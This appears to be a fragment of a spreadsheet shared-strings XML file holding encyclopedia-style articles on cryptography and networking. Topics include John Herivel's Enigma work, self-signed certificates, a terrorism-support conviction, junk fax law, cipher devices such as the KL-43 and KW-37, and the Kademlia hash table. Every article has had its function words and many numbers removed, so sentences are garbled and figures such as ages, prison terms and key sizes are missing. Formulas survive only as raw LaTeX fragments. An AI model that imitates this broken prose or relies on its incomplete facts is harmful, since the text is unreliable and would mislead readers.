    <t>John Herivel</t>
  </si>
  <si>
    <t>john william jamieson herivel august 1918 january 2011) british science historian world codebreaker bletchley park.as codebreaker concerned cryptanalysis enigma, herivel remembered chiefly discovery soon dubbed herivel herivelismus. herivelismus consisted idea, herivel method establishing whether applied using herivel square. based herivel's insight habits german operators enigma cipher machine allowed bletchley park easily deduce part daily key. brief critical period 1940, herivel conjunction "cillies" (another class operator error) main technique used solve enigma. after war, herivel became academic, studying history philosophy science queen's university belfast, particularly isaac newton, joseph fourier, christiaan huygens. 1956, took brief leave absence queen's work scholar dublin institute advanced studies. retirement, wrote autobiographical account work bletchley park entitled herivelismus german military enigma. recruitment bletchley park john herivel born belfast, attended methodist college belfast 1924 1936. 1937 awarded kitchener scholarship study mathematics sidney sussex college, cambridge, supervisor gordon welchman. welchman recruited herivel government code cypher school (gc&amp;cs) bletchley park. welchman worked alan turing newly formed section created solve army force enigma. herivel, aged arrived bletchley january 1940, briefed enigma alan turing tony kendrick. enigma time herivel started work bletchley park, limited success enigma-enciphered messages, mostly luftwaffe enigma network known "red". working alongside david rees, another cambridge mathematician recruited welchman, nearby elmers school, testing candidate solutions working plugboard settings. process slow, however, herivel determined find method improve attack, would spend evenings trying think ways so.intercepted morse coded messages enciphered germans' enigma, electro-mechanical rotor cipher machine implemented polyalphabetic cipher. main model 1940 three rotors electrical pathway keyboard lampboard. pressing caused lamp light right-most rotor advance letter position. this changed electrical pathway pressing caused different letter light positions, notch right-most rotor engaged middle rotor rotors advanced together, similarly middle rotor would engage left-most rotor, giving long period sequence repeated 17,576). ring rotor contained notch caused next rotor advance, could positions. three rotors selected five, giving different ways mounting rotors machine. however, germans laid rule rotor position successive days, previous days's rotors positions known, number reduced enigma machine worked reciprocally identical machine identical settings would, enciphered letters, show deciphered letters lampboard. enigma replica machines logically identical machines germans using. decipher intercepted messages required selection rotors, ring settings plugboard connections known. time, first three letters prelude message used indicator tell receiving operator letters appear windows particular message. herivel herivel insight february 1940 lazy german code clerks might give away enigma's ring settings (ringstellung) first message day. several lazy clerks, first message grundstellungs would random would clustering around ringstellung. insight became known herivel tip. needed time luftwaffe doubly-enciphering message keys techniques zygalski sheets could used. 1940, germans stopped doubly-enciphered keys. other methods becoming ineffective, bletchley park started using herivel break luftwaffe traffic. continued main method bombe delivered august 1940. enigma enciphering procedure rotors positioning ring containing notch changed daily. settings defined codebook common operators network. start day, messages sent received, enigma operators implemented day's rotor selection ring settings. having selected three rotors, adjusted ring settings. that could done rotors mounted axle inserted machine. possible adjust ring settings loaded rotors moving spring-loaded retaining right turning rotor display specified letter. herivel thought likely least operators would adjust rings mounted rotors machine. having alphabet rings closed lid, operator moved rotors well away positions displayed three letters ring setting windows, operators not. herivel's great insight came evening february 1940 relaxing front landlady's fire. stressed lazy operators rings rotors machine might left ring setting near used three letters first message day.for transmitted message, sending operator would follow standard procedure. from september 1938, would initial position encrypt indicator send clear, followed message enciphered setting. ground setting (german: grundstellung) example, would enigma rotors encrypt message setting, might choose rtq; might encrypt llp. (before 1940, encrypted message setting repeated, makes difference herivel's insight.) operator would turn rotors encrypt actual message. thus, preamble message would unencrypted ground setting (gkx), followed encrypted message setting (llp). receiving enigma operator could information recover message setting decrypt message. ground setting (gkx example) chosen random, herivel reasoned operators lazy, hurry otherwise pressure, might simply whatever rotor setting currently showing machine. first message operator ring settings rotors already inside machine, rotor position currently showing machine could well ring setting close situation occurred example, would ring setting close it). polish cryptographers used idea bruno phoney war. herivel square insight, herivel's colleagues agreed idea possible enigma. began looking effect predicted herivel arranged first messages transmitting station sent early. they plotted indicators grid termed "herivel square", example shown below. rows columns grid labelled alphabet. first indicator first message received station network, entered grid. done finding column corresponding first letter, corresponding second letter, entering third letter cell column intersected. example, would recorded entering cell column herivel suggested would cluster entries close together, cluster around example. that would narrow options ring settings 17,576 small possibilities, perhaps could tested individually. effect predicted herivel immediately show enigma traffic, however, bletchley park continue rely different technique enigma: method "perforated sheets", passed polish cryptologists. situation changed 1940, germans changed indicating procedure, rendering perforated sheet method obsolete. suddenly unable decrypt enigma. fortunately codebreakers, pattern predicted herivel began manifest soon may, germans invaded netherlands belgium. david rees spotted cluster indicators, luftwaffe message sent decoded, first since change procedure. additional components although herivel provided enigma's ring settings, provide parts enigma key: rotor order plugboard settings. luftwaffe time chose rotors, possible rotor orders. addition, might plugboard connections, means letters permuted plugboard. codebreakers methods find remaining portions enigma key. herivel used combination another class operator mistake, known "cillies", solve settings decipher messages.the herivel used several months specialised codebreaking machines designed alan turing, so-called "bombes", ready use. recognition gordon welchman wrote herivel vital part breaking enigma bletchley park. herivel recruited january 1940, would thought herivel tip, without would defeated 1940 unable maintain continuity bombes began arrive many months later? misconceptions last point. loss continuity would, stages, serious, disastrous." because importance contribution, herivel singled introduced winston churchill visit bletchley park. also taught enigma cryptanalysis party americans assigned intensive two-week course. herivel later worked administration "newmanry", section responsible solving german teleprinter ciphers using machine methods colossus computers, assistant head section, mathematician newman.in 2005, researchers studying enigma-encrypted messages world noted occurrence clustering, predicted herivel tip, messages august 1941. after world after war, herivel taught mathematics school year, found could handle "rumbustious boys". joined queen's university belfast, became reader history philosophy science. students supervised actor simon callow, said him: absolutely astonished. wonderful teacher, fashioned way. during tutorials used make toast crumpets fire. was) profound thinker unexpected approaches sense done anything extraordinary life. that generation; kiss tell. published books articles isaac newton, joseph fourier christiaan huygens. publications include: herivel, (april 1955), "the derivation equations motion ideal fluid hamilton's principle", mathematical proceedings cambridge philosophical society, (2): 344–349, bibcode:1955pcps...51..344h, doi:10.1017/s0305004100030267, s2cid 122422156 herivel, john (1965), background newton's principia: study newton's dynamical researches years 1664–84 based original manuscripts portsmouth collection library university cambridge, clarendon press herivel, (december 1966), "aspects french theoretical physics nineteenth century", british journal history science, (2): 109–132, doi:10.1017/s0007087400003794, s2cid 144562116 research paper based carried paris 1964 bourse marque awarded french government embassy london, grant research committee academic council queen's university, belfast. herivel, john; williams, pearce (november 1975), "joseph fourier: physicist", physics today, (11): bibcode:1975pht....28k..65h, doi:10.1063/1.3069206 herivel, john (1975), joseph fourier: physicist, clarendon press herivel, (december 1960), "newton's discovery centrifugal force", isis, (4): 546–553, doi:10.1086/349412, jstor 228612, s2cid 143523512 herivel, (december 1965), "newton's first solution problem kepler motion", british journal history science, (4): 350–354, doi:10.1017/s0007087400002508, jstor 4024891, s2cid 121724711 herivel, john (1970), "newton's achievement dynamics", annus mirabilis isaac newton: 1666-1966: 120–135in 1978 retired oxford, became fellow souls college. retirement published: herivel, john (2008), herivelismus german military enigma, baldwinhe died oxford 2011.he survived daughter josephine herivel. notes references good, jack (1993), enigma fish hinsley stripp 1993, 149–166 herivel, john (2008), herivelismus german military enigma, cleobury mortimer, shropshire: baldwin, isbn 978-0947712464 this contains account pre-war work enigma poland, written care professional historian. hinsley, f.h.; stripp, alan, eds. (1993) [1992], codebreakers: inside story bletchley park, oxford: oxford university press, isbn 978-0-19-280132-6 sebag-montefiore, hugh (2000), enigma: battle code, isbn 0-471-40738-0 smith, michael (1998), station codebreakers bletchley park, isbn 0-7522-2189-2 welchman, gordon (1997) [1982], story: breaking enigma codes, cleobury mortimer, shropshire: baldwin, isbn 0-947712-34-8 external links "mind codebreaker", companion site "decoding nazi secrets", originally broadcast november 1999. part part two. (contains similar material herivel smith, 1998).</t>
  </si>
  <si>
    <t>Self-signed certificate</t>
  </si>
  <si>
    <t>cryptography computer security, self-signed certificates public certificates users issue behalf, opposed certificate authority (ca) issuing them. these certificates easy make cost money. however, provide trust value. instance, website owner uses self-signed certificate provide https services, people visit website cannot certain connected intended destination. know, malicious third-party could redirecting connection using another self-signed certificate bearing holder name. connection still encrypted, lead intended target. comparison, ca-signed certificate prevents attack user's browser separately validates certificate issuing attacker's certificate fails validation. self-signed certificates, however, limited uses. they full trust value issuer sole user entity. example, encrypting file system microsoft windows issues self-signed certificate behalf encrypting user uses transparently decrypt data fly. another example root certificate, form self-signed certificate. benefits self-signed certificates created free, using wide variety tools including openssl, java's keytool, adobe reader, wolfssl apple's keychain. they easy customize; e.g, larger sizes hold additional metadata. their involve problems trusting third parties improperly sign certificates. self-signed certificate transactions usually present smaller attack surface eliminating complex certificate chain validation, revocation checks like ocsp. trust issues ca-based system, parties engaged secure communication must trust i.e. place certificates whitelist trusted certificates. developers browsers procedures specified ca/browser forum whitelist well-known, public certificate authorities. individual groups companies whitelist additional, private certificates. trust issues entity accepting self-signed certificate similar issues entity trusting addition certificate. parties self-signed must establish trust (using procedures outside pki), confirm accurate transfer public keys e.g. compare certificate's cryptographic hash band. there many subtle differences signed self-signed certificates, especially amount trust placed security assertions certificate. some verify identity person issue certificate; example military issues common access cards person, multiple forms attest identity values like including signed certificate. entity validates certificate trust information certificate, extent trust signed (and implication, security procedures used verify attested information). with self-signed certificate contrast, trust values certificate complicated entity possesses signing key, always generate certificate different values. example, validity dates self-signed certificate might trusted entity could always create sign certificate contained valid date range. values self-signed certificate trusted values verified out-of-band acceptance certificate, method verify self-signed certificate changed trusted. example, procedure trusting self-signed certificate includes manual verification validity dates, hash certificate incorporated white list. when certificate presented entity validate, first verify hash certificate matches reference hash white-list, match (indicating self-signed certificate formally trusted) certificate's validity dates trusted. special treatment x.509 certificate fields self-signed certificate found 3280.revocation self-signed certificates differs ca-signed certificates. nature, entity others) revoke self-signed certificate. could invalidate self-signed removing trust whitelist. uses self-signed certificates limited uses, e.g. cases issuer sole user entity. example, encrypting file system microsoft windows issues self-signed certificate behalf user account transparently encrypt decrypt files fly. another example root certificate, form self-signed certificate. also certificate authority implementation weakness trusted third party scheme x.509, standard describing widely used format storing certificates let's encrypt, certificate authority provides free domain-validated certificates references</t>
  </si>
  <si>
    <t>Jubair Ahmad</t>
  </si>
  <si>
    <t>jubair ahmad pakistani american woodbridge, virginia pleaded guilty december 2011 supporting designated foreign terrorist organization lashkar-e-taiba (let), producing propaganda video group. sentenced years prison 2012. early life ahmad born sialkot, pakistan. according affidavit submitted court fbi, ahmad stated pakistan attended training camp let. permanent resident u.s. arrived u.s. 2007. according september 2010 ahmad directly communicated talha saeed chief hafiz muhammad saeed, made video glorifying jihad request uploaded youtube ahmad second operative david headley plead guilty u.s. court. said killed jihad worrier named mazhar lying arrest guilty plea ahmad arrested september 2011 fbi. december 2011 ahmad acknowledged court made propaganda video later uploaded youtube. prosecuting attorney neil macbride pointed hearing lashkar-e-taiba violent islamist group widely believed responsible 2008 mumbai attacks americans died. ahmads lawyer declined comment stated clients case raised unique legal issues light ruling supreme court united states holder humanitarian project case intends discuss sentencing phase. sentenced years prison april 2012. also faisal shahzad pakistani criminal convicted 2010 times square bombing farooque ahmed pakistani-american convicted planning subway bombs washington, d.c., united states references external links virginia pleads guilty providing material support terrorist organization, fbi, 2011-12-02 affidavit submitted ahmad</t>
  </si>
  <si>
    <t>Junk fax</t>
  </si>
  <si>
    <t>junk faxes form telemarketing unsolicited advertisements sent transmission. junk faxes faxed equivalent spam junk mail. proponents advertising medium often terms broadcast advertising avoid negative connotation term junk fax. junk faxes generally considered nuisance since waste toner, paper machines. history junk faxing came widespread late 1980s result development proliferation relatively inexpensive desktop machines resulted rapid growth number machines u.s.[1] invention computer-based board 1985 hank magnuski, provided efficient platform reaching machines minimal cost effort. machines period typically used expensive thermal paper common complaint junk faxes consumed expensive paper without permission, thus shifting cost printing advertisement recipient. u.s., passage telephone consumer protection 1991 along action individual states reduced junk faxes time. however, late 1990s, junk faxing become widespread problem u.s., entry number large-scale broadcasters boasted capacity send millions advertisements day. because legal restrictions advertising widely known today, junk faxes predominately used connection disreputable fly-by-night marketers. national regulations united states telephone consumer protection 1991 227), tcpa, among things specifically outlawed junk faxing: telephone facsimile machine, computer, device send unsolicited advertisement telephone facsimile machine (paragraph (b)(1)(c))the tcpa also requires transmitter identify source phone number transmitting organization individual page. process dialing determine phone numbers reach machines also prohibited rules tcpa. tcpa, particular junk provision, challenged court first amendment grounds, withstood legal challenges. 2005, united states congress passed junk prevention 2005. amended tcpa longer prohibit unsolicited advertisements unsolicited advertisement sender established business relationship recipient(paragraph (b)(1)(c)(i))and sender complies requirements. april 2006, federal communications commission (fcc) implemented changes advertising rules tcpa. rules: codify established business relationship (ebr) exemption prohibition sending unsolicited advertisements; define used context unsolicited advertisements; require sender advertisements provide specified notice contact information allows recipients "opt-out" future transmissions sender; specify circumstances request "opt-out" complies act. rules took effect august 2006. federal tcpa permits state junk faxing laws equal restrictive federal law, many states laws regarding junk faxes. additionally, courts ruled unsolicited advertisements common conversion, independent statutory provisions exemptions. enforcement investigate violations impose fines violators. individuals receive junk faxes file complaint fcc. complaints must specify: that sender permission send (i.e. unsolicited) that complainant prior business relationship sender that good service telephone number addresses included your name, address, telephone number reached telephone number received advertisement copy advertisement, possible, confirmation retained copy faxfailure provide information result complaint closed without action. state authorities also take actions violations tcpa. also possible recipient junk bring private suit violator appropriate court state. through private suit, recipient either recover actual monetary loss resulted tcpa violation, receive $500 damages violation, whichever greater. court triple damages violation finds defendant acted willingly knowingly. and/or impose additional civil penalties $11,000.00 transmitted. united kingdom according government legislation 1999, unlawful send individual unsolicited sales marketing without prior consent customer. receiver company corporate instances, communications permitted unless subscriber previously notified caller communications sent line; subscriber’s line listed register kept regulation pecr. this register maintained behalf ofcom direct marketing association branded facsimile preference service ("fps"). canada unsolicited faxes regulated canadian radio-television telecommunications commission (crtc) must follow certain guidelines, individual right senders.[2] information rules telemarketing faxes canada found crtc unsolicited telecommunications rules. individuals wishing avoid faxes enroll crtc's national call list; effectiveness, however, point controversy. hong kong office telecommunications authority (ota) implemented regulations address junk faxes. complaints result disconnection offenders' phone service.[3] also black references commonly asked questions junk faxing hearings u.s. house representatives, sales machines u.s. 1986 192,000 machines, grew exponentially sales 465,000 1987 million 1988. house hearing 101-43, 1989 (statement prof. ellis). imposes tougher measures junk faxes. external links consumer fact sheet: advertising: what need know policy general complaint junkfax.org detailed information junk faxers information laws: cornell missouri american blast example legal challenge</t>
  </si>
  <si>
    <t>KCipher-2</t>
  </si>
  <si>
    <t>kcipher-2 stream cipher jointly developed kyushu university japanese telecommunications company kddi. standardized iso/iec 18033–4, list recommended ciphers published japanese cryptography research evaluation committees (cryptrec). length bits, encrypt decrypt around seven times faster advanced encryption standard (aes) algorithm. notes references</t>
  </si>
  <si>
    <t>Selective Repeat ARQ</t>
  </si>
  <si>
    <t>selective repeat arq/selective reject specific instance automatic repeat request (arq) protocol used manage sequence numbers retransmissions reliable communications. summary selective repeat part automatic repeat request (arq). with selective repeat, sender sends number frames specified window size even without need wait individual receiver go-back-n arq. receiver selectively reject single frame, retransmitted alone; contrasts forms arq, must send every frame point again. receiver accepts out-of-order frames buffers them. sender individually retransmits frames timed out. concept used protocol delivery acknowledgement message units, used protocol delivery subdivided message sub-units. when used protocol delivery messages, sending process continues send number frames specified window size even frame loss. unlike go-back-n arq, receiving process continue accept acknowledge frames sent initial error; general case sliding window protocol transmit receive window sizes greater receiver process keeps track sequence number earliest frame received, sends number every acknowledgement (ack) sends. frame sender reach receiver, sender continues send subsequent frames emptied window. receiver continues fill receiving window subsequent frames, replying time containing sequence number earliest missing frame. once sender sent frames window, re-sends frame number given acks, continues left off. size sending receiving windows must equal, half maximum sequence number (assuming sequence numbers numbered n−1) avoid miscommunication cases packets dropped. understand this, consider case acks destroyed. receiving window larger half maximum sequence number, some, possibly even all, packets present timeouts duplicates recognized such. sender moves window every packet acknowledged.when used protocol delivery subdivided messages works somewhat differently. non-continuous channels messages variable length, standard hybrid protocols treat message single unit. alternately selective retransmission employed conjunction basic mechanism message first subdivided sub-blocks (typically fixed length) process called packet segmentation. original variable length message thus represented concatenation variable number sub-blocks. while standard message whole either acknowledged (acked) negatively acknowledged (naked), selective transmission response would additionally carry flag indicating identity sub-block successfully received. selective retransmission sub-divided messages retransmission diminishes length, needing contain sub-blocks linked. channel models variable length messages, probability error-free reception diminishes inverse proportion increasing message length. words, easier receive short message longer message. therefore, standard techniques involving variable length messages increased difficulty delivering longer messages, repeat full length. selective re-transmission applied variable length messages completely eliminates difficulty delivering longer messages, successfully delivered sub-blocks retained transmission, number outstanding sub-blocks following transmissions diminishes. selective repeat implemented transmission. examples transmission control protocol uses variant go-back-n ensure reliable transmission data internet protocol, provide guaranteed delivery packets; selective acknowledgement (sack) extension, also selective repeat arq. itu-t g.hn standard, provides create high-speed gigabit/s) local area network using existing home wiring (power lines, phone lines coaxial cables), uses selective repeat ensure reliable transmission noisy media. g.hn employs packet segmentation sub-divide messages smaller units, increase probability received correctly. stanag 5066 profile radio data communications uses selective repeat arq, maximum window size protocol-data units (pdus). also go-back-n reliable data transfer pipeline (software) automatic repeat request computer networking references further reading lockitt, gatfield, dobyns, (1975). selective repeat system. international conference digital satellite communications. international conference digital satellite communications. 189–195. bibcode:1975dsc..conf..189l. weldon, (march 1982). improved selective-repeat strategy". ieee transactions communications. (3): 480–486. bibcode:1982itcom..30..480w. doi:10.1109/tcom.1982.1095497. issn 0090-6778. comroe, costello (july 1984). "arq schemes data transmission mobile radio systems". ieee journal selected areas communications. (4): 472–481. bibcode:1984ijsac...2..472c. doi:10.1109/jsac.1984.1146084.</t>
  </si>
  <si>
    <t>KL-43</t>
  </si>
  <si>
    <t>kl-43 portable, electronic cipher device used united states nato early 1980s. machine, manufactured trw, adaptation language translator technology, includes keyboard input output. also contains built-in modem, telephone coupler, facility connecting printer. version kl-43 famously used oliver north communicate assistant, fawn hall, others managing clandestine operations nicaragua support "contra" rebels. device paraded front cameras iran-contra congressional hearings. there number variations kl-43, including following: kl-43a early model. kl-43c tactical rugged version 1980s. kl-43d mid-production common version small keyboard (original cost us$300). kl-43e full-size keyboard model high volume office operations (original cost us$1000). kl-43f recent tactical version wired wireless networks made epi. external links david fiedler, kl-43: burst communications budget, army communicator, winter/spring 1990, vol. jerry proc's page kl-43 nato's kl-43c/f description</t>
  </si>
  <si>
    <t>KL-51</t>
  </si>
  <si>
    <t>kl-51 off-line keyboard encryption system read punched paper tape teleprinters. nato called race (rapid automatic cryptographic equipment). developed 1970s norwegian company, standard telefon kabelfabrik (stk). used digital electronics encryption instead rotors, first machine software based crypto algorithms. kl-51 robust machine made military specifications. u.s. national security agency bought 1980s replace earlier kl-7. 2006, u.s. navy developing plans replace kl-51 units still unit based modern universal crypto device. references sources museum caption shown photo. crypto machines kl-51/race http://www.knobstick.ca/pdf_files/race1.pdf</t>
  </si>
  <si>
    <t>KW-37</t>
  </si>
  <si>
    <t>kw-37, code named jason, encryption system developed 1950s u.s. national security agency protect fleet broadcasts u.s. navy. naval doctrine calls warships maintain radio silence maximum extent possible prevent ships located potential adversaries using radio direction finding. allow ships receive messages orders, navy broadcast continuous stream information, originally morse code later using radioteletype. messages included stream needed could individual ships, battle groups fleet whole. each ship's radio room would monitor broadcast decode forward messages directed appropriate officer. kw-37 designed automate process. consisted major components, kwr-37 receive unit kwt-37 transmit unit. each ship complement kwr-37 receivers (usually least two) decrypted fleet broadcast output teleprinter machines. kwt-37's typically located shore facilities, high power transmitters located. kwr-37 weighed pounds contained subminiature vacuum tubes, whose leads soldered printed circuit boards. each flip-flop kw-37 required three tubes, placing upper bound total number stages shift registers used 166. squeezing much logic small rugged package quite feat 1950s. each kwt-37 filled entire relay rack five stacked modules. precision time reference occupied bottom, three generators (stream cyphers civilian parlance) occupied middle alarm panel occupied position. outputs three generators combined voting circuit. units' output match two, alarm sounded output units agree continued used. each kwr-37 generator kwt-37 common fill device (cfd) loading keys calls cryptovariables). cfds similar first used kw-26, accepting punched cards remington rand format. changed every 0000 hours gmt. receivers synchronized transmitter time. receiver ever sync, power failure, operator current hour minute dials front panel. kwr-37 would "fast forward" stream sequence synchronization re-established. large numbers fleet broadcast cards produced distributed every navy ship many shore installations monthly basis, many people access them. while cards strictly accounted for, easy copy. this proved fatal weakness. kwr-37s fell north korean hands pueblo captured 1968. keying material issued ships throughout world limit ongoing damage. 1985 revealed walker ring selling lists cards soviet union decades. kw-37 systems taken service early 1990s. received input kw(r)-37 form multiple broadcast (multicast) signal, consisting many channels condensed tone pack deciphered stage kw(r)-37 output sent several kg-14's deciphered split signals channel fleet broadcast. kg-14 also received timing signal kw(r)-37; sync, 14's fall sync well. each kg-14 could process channel tone pack; fleet units kg-14's, larger units even more. experiences operating kwr-37 typically, fleet units utilizing kwr-37 units outfitted devices redundancy. should unit fail, would already online patches high level, 60-milliamp patch panel would quickly changed around current offline unit could changed online status moment's notice, ensure interruption message traffic. later life, kwr-37 units aged worn, sometimes circuit cards inside reseated rubber mallet helped ensure cards seated properly. other problems kwr-37's related startup times. fleet radiomen, stationed shore transmitting stations, listen signal coordinated universal time. radiomen called broadcast "time tick," gave sharp tone, signalling press restart button unit could start "new day" otherwise known "hj's" radiomen. this took place day's crypto keylist card properly inserted "crib" card reader securing onto pins firmly closing card access door locking key. once unit(s) restarted, placed back safe using two-person integrity (tpi) stringently enforced following walker investigation. early nineties kwr-37 units retired navy replaced reliable modern kwr-46's, fleet radiomen breathed sigh relief kwr-37 units often unreliable would occasionally fall synchronization timing, resulting loss broadcast messages various fleet channels. sources kwr-37 on-line crypto receiver jerry proc: "crypto machines", hmcs haida national historic site (2010).experiences operating kwr-37 personal account retired navy fleet radioman</t>
  </si>
  <si>
    <t>Kademlia</t>
  </si>
  <si>
    <t>kademlia distributed hash table decentralized peer-to-peer computer networks designed petar maymounkov david mazières 2002. specifies structure network exchange information node lookups. kademlia nodes communicate among using udp. virtual overlay network formed participant nodes. each node identified number node node serves identification, kademlia algorithm uses node locate values (usually file hashes keywords). fact, node provides direct file hashes node stores information obtain file resource. order look value associated given key, algorithm explores network several steps. each step find nodes closer contacted node returns value closer nodes found. this efficient: like many dhts, kademlia contacts {\displaystyle o(\log(n))} nodes search total {\displaystyle nodes system. further advantages found particularly decentralized structure, increases resistance denial-of-service attack. even whole nodes flooded, limited effect network availability, since network recover knitting network around "holes". i2p's implementation kademlia modified mitigate kademlia's vulnerabilities, sybil attacks. system details peer-to-peer networks made nodes, design. protocols nodes communicate, locate information, become efficient time. first generation peer-to-peer file sharing networks, napster, relied central database co-ordinate lookups network. second generation peer-to-peer networks, gnutella, used flooding locate files, searching every node network. third generation peer-to-peer networks, bittorrent, distributed hash tables look files network. distributed hash tables store resource locations throughout network. kademlia uses "distance" calculation nodes. this distance computed exclusive (xor) node ids, taking result unsigned integer number. keys node format length, distance calculated among exactly way. node typically large random number chosen goal unique particular node (see uuid). happen geographically widely separated nodes germany australia, instance "neighbors" chosen similar random node ids. chosen acts distance function node ids. specifically: distance node zero symmetric: "distances" calculated follows triangle inequality: given vertices (points) triangle, distance shorter equal distance distance b.these three conditions enough ensure captures essential, important features "real" distance function, cheap simple calculate.each kademlia search iteration comes closer target. basic kademlia network nodes take steps worst case) find node. fixed-size routing tables fixed-size routing tables presented pre-proceedings version original paper used later version mathematical proofs. actual kademlia implementation fixed-size routing table, dynamically-sized one. kademlia routing tables consist list node (e.g. node consists bits, node keep lists.) list many entries. every entry list holds necessary data locate another node. data list entry typically address, port, node another node. every list corresponds specific distance node. nodes list must differing node's first bits candidate must match node's this means easy populate first list nodes network away candidates. next list nodes network (one closer first), etc. with bits, every node network classify nodes different distances, specific distance bit. nodes encountered network, added lists. this includes store retrieval operations even helping nodes find key. every node encountered considered inclusion lists. therefore, knowledge node network dynamic. this keeps network constantly updated adds resilience failures attacks. kademlia literature, lists referred k-buckets. system wide number, like every k-bucket list entries inside; i.e. network k=20, node lists containing nodes particular particular distance itself). since possible nodes k-bucket decreases quickly (because nodes close), lower k-buckets fully nodes section network. since quantity possible much larger node population ever k-buckets corresponding short distances remain empty. consider simple network right. network size eight maximum keys nodes. there seven nodes participating; small circles bottom. node consideration node (binary 110) black. there three k-buckets node network. nodes zero, (binary 000, 001, 010) candidates farthest k-bucket. node three (binary 011, shown) participating network. middle k-bucket, nodes four five (binary 101) placed. finally, third k-bucket contain node seven (binary 111). each three k-buckets enclosed gray circle. size k-bucket two, farthest 2-bucket contain three nodes. example, node node farthest 2-bucket, would request node lookup nodes find location address) node zero. each node knows neighbourhood well contact nodes away help locate nodes away. known nodes connected long time network probably remain connected long time future. because statistical distribution, kademlia selects long connected nodes remain stored k-buckets. this increases number known valid nodes time future provides stable network. when k-bucket full node discovered k-bucket, least recently seen node k-bucket pinged. node found still alive, node placed secondary list, replacement cache. replacement cache used node k-bucket stops responding. words: nodes used older nodes disappear. protocol messages kademlia four messages. ping used verify node still alive. store stores (key, value) pair node. find_node recipient request return nodes buckets closest ones requested key. find_value same find_node, recipient request requested store, return corresponding value.each message includes random value initiator. this ensures response received corresponds request previously sent (see magic cookie). locating nodes node lookups proceed asynchronously. quantity simultaneous lookups denoted typically three. node initiates find_node request querying nodes k-buckets closest ones desired key. when recipient nodes receive request, look k-buckets return closest nodes desired know. requester update results list results (node ids) receives, keeping best ones (the nodes closer searched key) respond queries. then requester select best results issue request them, iterate process again. because every node better knowledge surroundings node has, received results nodes every time closer closer searched key. iterations continue nodes returned closer best previous results. when iterations stop, best nodes results list ones whole network closest desired key. node information augmented round trip times, rtt. this information used choose time-out specific every consulted node. when query times out, another query initiated, never surpassing queries time. locating resources information located mapping key. hash typically used map. storer nodes information previous store message. locating value follows procedure locating closest nodes key, except search terminates node requested value store returns value. values stored several nodes them) allow nodes come still value available node. periodically, node stores value explore network find nodes close value replicate value onto them. this compensates disappeared nodes. also, popular values might many requests, load storer nodes diminished retriever store value node near, outside closest ones. this storing called cache. value stored farther farther away key, depending quantity requests. this allows popular searches find storer quickly. because value returned nodes farther away key, alleviates possible "hot spots". caching nodes drop value certain time depending distance key. some implementations (e.g. kad) neither replication caching. purpose remove information quickly system. node providing file periodically refresh information onto network (perform find_node store messages). when nodes file offline, nobody refreshing values (sources keywords) information eventually disappear network. joining network node would like join must first bootstrap process. phase, joining node needs know address port another node—a bootstrap node (obtained user, stored list)—that already participating kademlia network. joining node participated network computes random number, virtue large random number extremely likely already assigned node. uses leaving network. joining node inserts bootstrap node k-buckets. joining node performs node lookup bootstrap node (the node knows). "self-lookup" populate nodes' k-buckets node populate joining node's k-buckets nodes path bootstrap node. after this, joining node refreshes k-buckets away k-bucket bootstrap node falls this refresh lookup random within k-bucket range. initially, nodes k-bucket. when k-bucket becomes full, split. split occurs range nodes k-bucket spans node's (values left right binary tree). kademlia relaxes even rule "closest nodes" k-bucket, typically single bucket correspond distance nodes closest node are, want know all. turn highly unbalanced binary sub-tree exists near node. nodes prefix "xxx0011....." node "xxx000011001", node contain multiple k-buckets nodes. this guarantee network knows nodes closest region. accelerated lookups kademlia uses metric define distance. node node xored result distance them. bit, function returns zero bits equal bits different. metric distances hold triangle inequality: given vertices (points) triangle, distance shorter equal distances metric allows kademlia extend routing tables beyond single bits. groups bits placed k-buckets. group bits termed prefix. m-bit prefix, 2m-1 k-buckets. missing k-bucket extension routing tree contains node m-bit prefix reduces maximum number lookups log2 log2m these maximum values average value less, increasing chance finding node k-bucket shares bits prefix target key. nodes mixtures prefixes routing table, network used emule. kademlia network could even heterogeneous routing table implementations, expense complicating analysis lookups. academic significance while metric needed understand kademlia, critical analysis protocol. arithmetic forms abelian group allowing closed analysis. other protocols algorithms require simulation complicated formal analysis order predict network behavior correctness. using groups bits routing information also simplifies algorithms. mathematical analysis algorithm analyze algorithm, consider kademlia network {\displaystyle nodes {\displaystyle x_{1},\ldots ,x_{n}} string length {\displaystyle consists ones zeros. modeled trie, leaf represents node, labeled path root leaf represents node {\displaystyle x\in \{x_{1},\ldots ,x_{n}\}} {\displaystyle {\mathcal {d}}_{i}(x)} nodes (ids) share prefix {\displaystyle length {\displaystyle d-i} then filling {\displaystyle bucket {\displaystyle modeled adding pointers leaf {\displaystyle {\displaystyle leaves (ids) chosen uniformly random {\displaystyle {\mathcal {d}}_{i}(x)} thus routing seen jumping among leaves along pointers step goes towards target much possible, i.e., greedy way. {\displaystyle t_{xy}} number jumps needed leaf {\displaystyle target {\displaystyle assuming {\displaystyle x_{1},\ldots ,x_{n}} chosen deterministically {\displaystyle \{0,1\}^{d}} proved {\displaystyle \sup _{x_{1},\ldots ,x_{n}}\,\sup _{x\in \{x_{1},\ldots ,x_{n}\}}\,\sup _{y\in \{0,1\}^{d}}\mathbb [t_{xy}]\leq (1+o(1)){\frac {\log n}{h_{k}}},} {\displaystyle h_{k}} {\displaystyle harmonic number. since {\displaystyle h_{k}/\log k\to {\displaystyle k\to \infty {\displaystyle large {\displaystyle \mathbb t_{xy}} bounded {\displaystyle \log _{k}n} however target chosen. this justifies intuition kademlia {\displaystyle o(\log nodes contacted searching target node. make model closer real kademlia networks, {\displaystyle x_{1},\ldots ,x_{n}} also assumed chosen uniformly random without replacement {\displaystyle \{0,1\}^{d}} then proved {\displaystyle x\in \{x_{1},\ldots ,x_{n}\}} {\displaystyle y\in \{0,1\}^{d}} {\displaystyle {\begin{aligned}&amp;t_{xy}{\xrightarrow {p}}{\frac {\log n}{c_{k}}},\\&amp;\mathbb [t_{xy}]\to {\frac {\log n}{c_{k}}},\end{aligned}}} {\displaystyle c_{k}} constant depending {\displaystyle {\displaystyle c_{k}/h_{k}\to {\displaystyle k\to \infty thus {\displaystyle large, {\displaystyle \mathbb t_{xy}/\log _{k}n} converges constant close {\displaystyle this implies number nodes need contact searching target node actually {\displaystyle \theta (\log _{k}n)} average. file sharing networks kademlia used file sharing networks. making kademlia keyword searches, find information file-sharing network downloaded. since central instance store index existing files, task divided evenly among clients: node wants share file, processes contents file, calculating number (hash) identify file within file-sharing network. hashes node must length. searches several nodes whose close hash, address stored nodes. i.e. publishes source file. searching client kademlia search network node whose smallest distance file hash, retrieve sources list stored node. since correspond many values, e.g. many sources file, every storing node different information. then, sources requested nodes close key.the file hash usually obtained specially formed internet magnet link found elsewhere, included within 